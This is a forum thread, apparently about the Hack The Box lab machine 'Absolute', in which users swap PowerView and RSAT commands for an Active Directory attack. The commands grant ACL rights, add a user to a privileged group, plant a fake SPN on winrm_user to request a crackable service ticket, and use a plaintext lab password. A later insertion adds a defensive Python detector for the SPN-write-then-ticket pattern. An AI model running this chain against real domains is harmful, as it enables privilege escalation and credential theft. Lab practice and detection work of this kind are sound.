Posts: 23 Threads: 0 Joined: N/A
September 25, 2022 at 8:15 PM
(September 25, 2022, 07:55 PM)fl0mms Wrote:
(September 25, 2022, 07:49 PM)user_htb22 Wrote:
(September 25, 2022, 07:48 PM)fl0mms Wrote:
(September 25, 2022, 07:37 PM)Photographer Wrote:
(September 25, 2022, 07:32 PM)fl0mms Wrote:
do you need to be in sync? If so, I need help with the synchronization of the clock with the machine.
install ntpdate
sudo ntpdate absolute.htb
I did it but it doesn't change anything.
sudo timedatectl set-ntp false
sudo ntpdate -s absolute.htb
watch the time change
thx bro :heart: U
+welcome

Posts: 18 Threads: 0 Joined: N/A
September 25, 2022 at 8:30 PM
So amazing

Posts: 23 Threads: 0 Joined: N/A
September 25, 2022 at 8:30 PM
(September 25, 2022, 06:56 PM)jahman Wrote:
(September 25, 2022, 06:24 PM)delmerherberth Wrote:
(September 25, 2022, 04:32 PM)technic Wrote:
the ldap entry of winrm_user contains msDS-KeyCredentialLink & userCertificate, not sure if it is useful.
X509v3 Extended Key Usage:
    TLS Web Client Authentication, TLS Web Server Authentication
X509v3 Key Usage: critical
    Digital Signature, Key Encipherment
How did you enumerate this exactly? I tried enumerating ldap with ldapsearch and I keep getting error "Matching credential not found"
Maybe not the simplest solution..
- You can convert your ccache file to a kirbi file with ticketConverter.py,
- then import the ticket to a windows box with Rubeus,
- Finally, "SharpHound.exe --domain absolute.htb -c all"
Unfortunately SharpHound isn't connecting to the LDAP. I can use Rubeus to apply the ticket, I can even get one using asktgt but SharpHound isn't taking into account the ticket in my session. I tried the latest version and v1.0.2, 1.0.3, 1.0.4 ... not sure why SharpHound isn't connecting.

Posts: 15 Threads: 0 Joined: N/A
September 25, 2022 at 10:27 PM
Here is how I obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb" -Credential $Cred -Domain absolute.htb -Server dc.absolute.htb -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser -Domain absolute.htb -Server dc.absolute.htb -Credential $Cred winrm_user | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH
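
For defenders, the SPN write followed by a service ticket request in the post above leaves a recognisable pair of events in the domain controller's Security log. The following is an added example, not code from the thread: it correlates a directory change event (5136) that adds servicePrincipalName to a user object with a later Kerberos service ticket event (4769) for the same account. The event records are constructed samples, and it assumes directory service change auditing is enabled and that the object's CN equals its sAMAccountName.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), reduced to the fields used below.
EVENTS = [
    {"id": 5136, "time": "2022-09-25T22:20:01", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "nonexistent/BLAHBLAH", "OperationType": "%%14674"},
    {"id": 4769, "time": "2022-09-25T22:20:09", "ServiceName": "winrm_user",
     "TargetUserName": "m.lovegod@ABSOLUTE.HTB", "TicketEncryptionType": "0x17"},
    # Benign pair: SPN registered on a computer object, AES ticket for it.
    {"id": 5136, "time": "2022-09-25T22:30:00", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=absolute,DC=htb", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/web01.absolute.htb", "OperationType": "%%14674"},
    {"id": 4769, "time": "2022-09-25T22:30:05", "ServiceName": "WEB01$",
     "TargetUserName": "svc_web@ABSOLUTE.HTB", "TicketEncryptionType": "0x12"},
]

VALUE_ADDED = "%%14674"         # 5136 OperationType meaning "Value Added"
RC4_HMAC = "0x17"               # 4769 TicketEncryptionType for RC4-HMAC
WINDOW = timedelta(minutes=10)  # assumed correlation window


def cn_of(dn):
    """First RDN value of a DN (assumes no escaped commas in the CN)."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def find_spn_then_ticket(events, window=WINDOW):
    """Pair each SPN added to a user object with later 4769s for that account."""
    writes, alerts = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 5136 and ev["ObjectClass"] == "user"
                and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and ev["OperationType"] == VALUE_ADDED):
            writes.append((when, cn_of(ev["ObjectDN"]).lower(), ev))
        elif ev["id"] == 4769:
            for wrote_at, account, write in writes:
                if ev["ServiceName"].lower() == account and when - wrote_at <= window:
                    alerts.append({"account": account,
                                   "spn": write["AttributeValue"],
                                   "written_by": write["SubjectUserName"],
                                   "requested_by": ev["TargetUserName"],
                                   "rc4": ev["TicketEncryptionType"] == RC4_HMAC})
    return alerts


if __name__ == "__main__":
    for alert in find_spn_then_ticket(EVENTS):
        print(alert)
```
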

Posts: 15 Threads: 0 Joined: N/A
September 25, 2022 at 11:46 PM
(September 25, 2022, 11:34 PM)Hacker2222 Wrote:
(September 25, 2022, 10:27 PM)jahman Wrote:
Here is how I obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb" -Credential $Cred -Domain absolute.htb -Server dc.absolute.htb -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser -Domain absolute.htb -Server dc.absolute.htb -Credential $Cred winrm_user | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH

hmm getting bad credentials with powerview ..
i changed a little bit the code (add a new Credential object after adding the user to the network group). Hope it will be good for you now.
you need to "Import-Module ActiveDirectory" and powerview, and the box is resetting the ad params very quick

Posts: 15 Threads: 0 Joined: N/A
September 26, 2022 at 12:09 AM
(September 26, 2022, 12:02 AM)Hacker2222 Wrote:
i think commandovm didn't install rsat ....................... maybe that's it
Add-DomainObjectAcl is a powerview function. is your DNS client configured to the box?
Add-ADPrincipalGroupMembership is a rsat-powershell

Posts: 213 Threads: 0 Joined: N/A
September 26, 2022 at 1:14 PM
If anyone else gets this error when running crackmapexec ldap -k --kdcHost ...:
TypeError: ldap.kerberos_login() missing 1 required positional argument: 'kdcHost'
Turns out there is a bug in crackmapexec 5.2.2: https://pythontechworld.com/issue/byt3bl33d3r/crackmapexec/524
This version comes preinstalled with Kali. Using cme 5.3.0 downloaded from GitHub works fine.

Posts: 23 Threads: 0 Joined: N/A
September 26, 2022 at 2:39 PM
(September 25, 2022, 11:50 PM)Hacker2222 Wrote:
(September 25, 2022, 11:46 PM)jahman Wrote:
(September 25, 2022, 11:34 PM)Hacker2222 Wrote:
(September 25, 2022, 10:27 PM)jahman Wrote:
Here is how I obtain the winrm_user hash, not cracked for now

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb" -Credential $Cred -Domain absolute.htb -Server dc.absolute.htb -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}
Get-DomainUser -Domain absolute.htb -Server dc.absolute.htb -Credential $Cred winrm_user | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH

hmm getting bad credentials with powerview ..
i changed a little bit the code (add a new Credential object after adding the user to the network group). Hope it will be good for you now.
you need to "Import-Module ActiveDirectory" and powerview, and the box is resetting the ad params very quick
i mean the first command
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb -principalidentity "m.lovegod"
When I try to set the SPN, I get the following error:
"WARNING: [Set-DomainObject] Error setting/replacing properties for object 'winrm_user' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied."
Not sure what's wrong in my setup. I have the RSAT installed and everything.

Posts: 22 Threads: 0 Joined: N/A
September 26, 2022 at 4:02 PM
(September 26, 2022, 12:02 AM)Hacker2222 Wrote:
i think commandovm didn't install rsat ....................... maybe that's it
Win10 Home Edition. no RSAT :(

Posts: 23 Threads: 0 Joined: N/A
September 26, 2022 at 8:58 PM
(September 26, 2022, 12:21 AM)Hacker2222 Wrote:
(September 26, 2022, 12:09 AM)jahman Wrote:
(September 26, 2022, 12:02 AM)Hacker2222 Wrote:
i think commandovm didn't install rsat ....................... maybe that's it
Add-DomainObjectAcl is a powerview function. is your DNS client configured to the box?
Add-ADPrincipalGroupMembership is a rsat-powershell
btw if hash doesn't crack then u prob have to use msDS-KeyCredentialLink on that user (not on other users LOL)
get this error :

Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
"
At C:\Users\administrador\Desktop\scripts\PowerView.ps1:6663 char:20
+ else { $Results = $ObjectSearcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException

Unable to resolve principal: m.lovegod
At C:\Users\administrador\Desktop\scripts\PowerView.ps1:8529 char:13
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException
+ FullyQualifiedErrorId : Unable to resolve principal: m.lovegod

same error what is missing